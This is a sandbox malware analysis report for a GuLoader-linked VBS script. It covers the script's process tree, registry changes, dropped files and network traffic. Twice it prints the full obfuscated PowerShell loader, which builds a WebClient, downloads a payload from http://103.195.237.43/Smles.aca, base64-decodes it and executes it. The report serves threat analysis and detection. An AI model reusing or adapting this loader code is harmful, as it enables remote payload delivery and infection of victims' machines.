| File name: | 66ce9c55c62d75654d6783b1d829b92a5a3f3283e4f977a03a185618d239386f.vbs |
| Full analysis: | https://app.any.run/tasks/37896300-c8dd-4061-8ee6-155046e675a6 |
| Verdict: | Malicious activity |
| Threats: | GuLoader is an advanced downloader written in shellcode. It’s used by criminals to distribute other malware, notably trojans, on a large scale. It’s infamous for using anti-detection and anti-analysis capabilities. |
| Analysis date: | June 24, 2024, 15:58:12 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with CRLF line terminators |
| MD5: | 6075CE496623997578269DF7D388F450 |
| SHA1: | 8D38A5F600D9930588A6E8AC7601DCA767678FB8 |
| SHA256: | 66CE9C55C62D75654D6783B1D829B92A5A3F3283E4F977A03A185618D239386F |
| SSDEEP: | 3072:SmN8GGebKjeK3ubth+DCFxKCvBB/WnHPP1w/sLJFJ281QIHz1y8mNy7Ey1MgKTZE:S08GxbKja3+DCbKCvBB/WnHXC/sLJFJp |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 240 | "C:\WINDOWS\System32\WScript.exe" C:\Users\admin\AppData\Local\Temp\66ce9c55c62d75654d6783b1d829b92a5a3f3283e4f977a03a185618d239386f.vbs | C:\Windows\System32\wscript.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
| 256 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Dobbeltheder Eskimoerne Maniacal Rediscounts Intensively Winrow Daginstitutioner Vum Pachnolite Introducement Naucrary Lygtemand Renpris Lyttas baobabtrs Mineralizers akutindlggelsen Motorsagkyndige138 Overnaturlige Marginalgruppernes Asylums Ohj Substraters basilidian';$munificentness = 1;Function Unsafer($regnskov){$Computervirksomheden121=$regnskov.Length-$munificentness;$Hyperparasitise='SUBSTRIN';$Hyperparasitise+='G';For( $Hjemvisningen=1;$Hjemvisningen -lt $Computervirksomheden121;$Hjemvisningen+=2){$Dobbeltheder+=$regnskov.$Hyperparasitise.Invoke( $Hjemvisningen, $munificentness);}$Dobbeltheder;}function Unspoiledness($Capillatus){ .($Emmentaler) ($Capillatus);}$Stymied=Unsafer 'GM oSzEiCl l,a /,5I.,0F D(SWGi.n dMouwCsD ,N,T, D1P0F.P0T;, MW i,nH6A4 ;S .x 6P4D;C Er v,:D1 2,1T.,0,)L ,GUe cAk.oA/.2.0 1 0,0T1I0b1 LFliSrLe fFoTx /S1 2F1P.,0 ';$Margenkodens=Unsafer 'VU,sUe r - A,g eanRtk ';$Intensively=Unsafer 'Nh t tLpS:./V/.1.0B3G.T1S9B5..M2C3 7C.,4l3M/SSEmHl,ePsC..aNcUam ';$Aalekragers=Unsafer 'L>H ';$Emmentaler=Unsafer 'TiFe xB ';$aldeles='Vum';$macropinacoid = Unsafer '.eDcCh o, M% aVpUp d a,tTa %,\NP o.s,t eDlCi nC. HMe.l. & &B NeSc hAo tU ';Unspoiledness (Unsafer 'S$Qg.lBoUbFaDl :LA.ifdGophKe v,e d,oS=I(Kc,m,d, /.cu S$ m.aGc,r oIpFi n.a,cSoHiOd )A ');Unspoiledness (Unsafer ' $ g ltoBbPa,lA: R,eLd i,sScFoBu,nFt,sR=L$UI n tLe.nCsFiBv e,lAy,..s,p lGiLtI(F$BABaBlVe k,r.aCg e rGsa) ');Unspoiledness (Unsafer 'U[ NAeAtS.USAe rTv i,c.eJP.oEi nUt,M.a nMa g.ePrN] :P:US eMc.uSr.iGt y P.rHoIt oTcSoil. W= D[ NFe t .AS e,c u rSiPtByMPNrRoJt oScVo lTTBy pFe ]B:S:pT,l sP1,2, ');$Intensively=$Rediscounts[0];$Sparekassebestyreren= (Unsafer ',$ gVlGoLbRaDl,:CK a.p ist lPe = N eDw.-TOTbCj e,c,t uS.yTsOtAe,m .RNFe tF. W e b,C,lki eSn t');$Sparekassebestyreren+=$Aidohevedo[1];Unspoiledness ($Sparekassebestyreren);Unspoiledness (Unsafer 'S$ K a.pKi,t,l eC.sHKeHaIdIemr s [B$UM a r g eGn kToBd etnUsH] =.$DS.t yFmAi ePdI ');$Pantiles=Unsafer 'P$HKCa p.iJtdlMe .MD.o w nKlPoUa,dAF iRl,eH(.$tI nFtkeEnGs.i v,e,lAyF, $.OEhWjP), ';$Ohj=$Aidohevedo[0];Unspoiledness (Unsafer ' $AgblTo bMaClI:UO fMfBe rDg aTv e,nS=r(OT e sbt -DP aGt hH $HONh jH) ');while (!$Offergaven) {Unspoiledness (Unsafer ' $,g l.o b,aEl :AB aTj oDn eRtOf,gPtSn iSn g sR= $Dt rSuDeA ') ;Unspoiledness $Pantiles;Unspoiledness (Unsafer 'ASKtTaSr,t -VSUl eTeMp. ,4 ');Unspoiledness (Unsafer ' $.gHl,oKbSa lE:GO fUf.e rGgSaLv e.nL= (ETUe s t.-.PNa t hT $ O.hAj.)O ') ;Unspoiledness (Unsafer 'r$ g l oGb aLl :UM.aUn.i,a.cGa.lB=H$Sg,lDoKbHa l :.E sSkSi m o e r n,e +E+ % $,R,eFdIi,sAc.o u n,t sG. cHoAuPnDt, ') ;$Intensively=$Rediscounts[$Maniacal];}$Fossilised=347926;$Normoblastic=26700;Unspoiledness (Unsafer ',$Tg,lCo b.aEl,:GPtapc hBn,oFl.i,tSe = .GAe.t -.C o n t eBnUtE C$KO hSj. ');Unspoiledness (Unsafer 'c$SgBlMo b a,lG:.N iUnRe.lT R=S I[ S yPs.t.e mT. CPoTn vSe,rat ],: :AF r.o mVB.aSs e.6D4AS tCr i nEg.(.$.POaUcUh nToElViFt eG)O ');Unspoiledness (Unsafer 'B$TgGl oGbGa.lF:PLAy,gStne.m.aAn.d. =P A[tSRyas t e m,.STAeCxDtR. E nlcGo d iTnNg.].:T:FASS C,I,I .PGReEt SSt rEiCn g (S$SNEiRn.e,lY)M ');Unspoiledness (Unsafer 'C$,g.lSo bSaBlM:TE,nLcLi nMc,tOuMrde d =C$,LCysg tFeSmSaCn,d,. sEu.b,s t rSi nkg (V$ Fbo s s iCl,iMs,eNd,,S$TNSo.r.m.oVb l,a,s t iBc.)H ');Unspoiledness $Encinctured;" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wscript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1048 | "C:\WINDOWS\system32\cmd.exe" /c "echo %appdata%\Postelin.Hel && echo t" | C:\Windows\System32\cmd.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4660 | "C:\WINDOWS\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Dobbeltheder Eskimoerne Maniacal Rediscounts Intensively Winrow Daginstitutioner Vum Pachnolite Introducement Naucrary Lygtemand Renpris Lyttas baobabtrs Mineralizers akutindlggelsen Motorsagkyndige138 Overnaturlige Marginalgruppernes Asylums Ohj Substraters basilidian';$munificentness = 1;Function Unsafer($regnskov){$Computervirksomheden121=$regnskov.Length-$munificentness;$Hyperparasitise='SUBSTRIN';$Hyperparasitise+='G';For( $Hjemvisningen=1;$Hjemvisningen -lt $Computervirksomheden121;$Hjemvisningen+=2){$Dobbeltheder+=$regnskov.$Hyperparasitise.Invoke( $Hjemvisningen, $munificentness);}$Dobbeltheder;}function Unspoiledness($Capillatus){ .($Emmentaler) ($Capillatus);}$Stymied=Unsafer 'GM oSzEiCl l,a /,5I.,0F D(SWGi.n dMouwCsD ,N,T, D1P0F.P0T;, MW i,nH6A4 ;S .x 6P4D;C Er v,:D1 2,1T.,0,)L ,GUe cAk.oA/.2.0 1 0,0T1I0b1 LFliSrLe fFoTx /S1 2F1P.,0 ';$Margenkodens=Unsafer 'VU,sUe r - A,g eanRtk ';$Intensively=Unsafer 'Nh t tLpS:./V/.1.0B3G.T1S9B5..M2C3 7C.,4l3M/SSEmHl,ePsC..aNcUam ';$Aalekragers=Unsafer 'L>H ';$Emmentaler=Unsafer 'TiFe xB ';$aldeles='Vum';$macropinacoid = Unsafer '.eDcCh o, M% aVpUp d a,tTa %,\NP o.s,t eDlCi nC. HMe.l. & &B NeSc hAo tU ';Unspoiledness (Unsafer 'S$Qg.lBoUbFaDl :LA.ifdGophKe v,e d,oS=I(Kc,m,d, /.cu S$ m.aGc,r oIpFi n.a,cSoHiOd )A ');Unspoiledness (Unsafer ' $ g ltoBbPa,lA: R,eLd i,sScFoBu,nFt,sR=L$UI n tLe.nCsFiBv e,lAy,..s,p lGiLtI(F$BABaBlVe k,r.aCg e rGsa) ');Unspoiledness (Unsafer 'U[ NAeAtS.USAe rTv i,c.eJP.oEi nUt,M.a nMa g.ePrN] :P:US eMc.uSr.iGt y P.rHoIt oTcSoil. W= D[ NFe t .AS e,c u rSiPtByMPNrRoJt oScVo lTTBy pFe ]B:S:pT,l sP1,2, ');$Intensively=$Rediscounts[0];$Sparekassebestyreren= (Unsafer ',$ gVlGoLbRaDl,:CK a.p ist lPe = N eDw.-TOTbCj e,c,t uS.yTsOtAe,m .RNFe tF. W e b,C,lki eSn t');$Sparekassebestyreren+=$Aidohevedo[1];Unspoiledness ($Sparekassebestyreren);Unspoiledness (Unsafer 'S$ K a.pKi,t,l eC.sHKeHaIdIemr s [B$UM a r g eGn kToBd etnUsH] =.$DS.t yFmAi ePdI ');$Pantiles=Unsafer 'P$HKCa p.iJtdlMe .MD.o w nKlPoUa,dAF iRl,eH(.$tI nFtkeEnGs.i v,e,lAyF, $.OEhWjP), ';$Ohj=$Aidohevedo[0];Unspoiledness (Unsafer ' $AgblTo bMaClI:UO fMfBe rDg aTv e,nS=r(OT e sbt -DP aGt hH $HONh jH) ');while (!$Offergaven) {Unspoiledness (Unsafer ' $,g l.o b,aEl :AB aTj oDn eRtOf,gPtSn iSn g sR= $Dt rSuDeA ') ;Unspoiledness $Pantiles;Unspoiledness (Unsafer 'ASKtTaSr,t -VSUl eTeMp. ,4 ');Unspoiledness (Unsafer ' $.gHl,oKbSa lE:GO fUf.e rGgSaLv e.nL= (ETUe s t.-.PNa t hT $ O.hAj.)O ') ;Unspoiledness (Unsafer 'r$ g l oGb aLl :UM.aUn.i,a.cGa.lB=H$Sg,lDoKbHa l :.E sSkSi m o e r n,e +E+ % $,R,eFdIi,sAc.o u n,t sG. cHoAuPnDt, ') ;$Intensively=$Rediscounts[$Maniacal];}$Fossilised=347926;$Normoblastic=26700;Unspoiledness (Unsafer ',$Tg,lCo b.aEl,:GPtapc hBn,oFl.i,tSe = .GAe.t -.C o n t eBnUtE C$KO hSj. ');Unspoiledness (Unsafer 'c$SgBlMo b a,lG:.N iUnRe.lT R=S I[ S yPs.t.e mT. CPoTn vSe,rat ],: :AF r.o mVB.aSs e.6D4AS tCr i nEg.(.$.POaUcUh nToElViFt eG)O ');Unspoiledness (Unsafer 'B$TgGl oGbGa.lF:PLAy,gStne.m.aAn.d. =P A[tSRyas t e m,.STAeCxDtR. E nlcGo d iTnNg.].:T:FASS C,I,I .PGReEt SSt rEiCn g (S$SNEiRn.e,lY)M ');Unspoiledness (Unsafer 'C$,g.lSo bSaBlM:TE,nLcLi nMc,tOuMrde d =C$,LCysg tFeSmSaCn,d,. sEu.b,s t rSi nkg (V$ Fbo s s iCl,iMs,eNd,,S$TNSo.r.m.oVb l,a,s t iBc.)H ');Unspoiledness $Encinctured;" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5052 | "C:\WINDOWS\system32\cmd.exe" /c "echo %appdata%\Postelin.Hel && echo t" | C:\Windows\SysWOW64\cmd.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5812 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (240) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (240) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (240) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (240) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (256) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (256) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
| (PID) Process: | (256) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
| (PID) Process: | (256) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | FileTracingMask |
Value: | |||
| (PID) Process: | (256) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | ConsoleTracingMask |
Value: | |||
| (PID) Process: | (256) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 4660 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary | |
MD5:8E7D26D71A1CAF822C338431F0651251 | SHA256:495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084 | |||
| 256 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0fspeecn.3ms.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 256 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2r2esynl.c3o.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 256 | powershell.exe | C:\Users\admin\AppData\Roaming\Postelin.Hel | text | |
MD5:83F830EA7D4E3C50D53E586B5601F185 | SHA256:D1F964E8E0BB64724041DB69BE5F22E031AB97CDB70129CF9F63BF280471B013 | |||
| 4660 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rnfy32yu.uvm.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 4660 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_l455cqov.fq3.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
3872 | svchost.exe | GET | 200 | 23.48.23.143:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | unknown |
256 | powershell.exe | GET | 200 | 103.195.237.43:80 | http://103.195.237.43/Smles.aca | unknown | — | — | unknown |
3872 | svchost.exe | GET | 200 | 69.192.161.161:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | unknown |
4656 | SearchApp.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAzlnDD9eoNTLi0BRrMy%2BWU%3D | unknown | — | — | unknown |
3040 | OfficeClickToRun.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA77flR%2B3w%2FxBpruV2lte6A%3D | unknown | — | — | unknown |
1544 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | unknown |
880 | SIHClient.exe | GET | 200 | 69.192.161.161:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | unknown |
880 | SIHClient.exe | GET | 200 | 69.192.161.161:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | unknown |
2660 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEApDqVCbATUviZV57HIIulA%3D | unknown | — | — | unknown |
992 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEApDqVCbATUviZV57HIIulA%3D | unknown | — | — | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
4032 | svchost.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
3872 | svchost.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
2672 | RUXIMICS.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
1540 | MoUsoCoreWorker.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
256 | powershell.exe | 103.195.237.43:80 | — | AZ VIET NAM COMMUNICATIONS TECHNOLOGY COMPANY LIMITED | VN | unknown |
3872 | svchost.exe | 23.48.23.143:80 | crl.microsoft.com | Akamai International B.V. | DE | unknown |
3872 | svchost.exe | 69.192.161.161:80 | www.microsoft.com | AKAMAI-AS | DE | unknown |
3040 | OfficeClickToRun.exe | 40.79.173.40:443 | self.events.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | AU | unknown |
3040 | OfficeClickToRun.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
self.events.data.microsoft.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
www.bing.com |
| whitelisted |
login.live.com |
| whitelisted |
r.bing.com |
| whitelisted |
go.microsoft.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |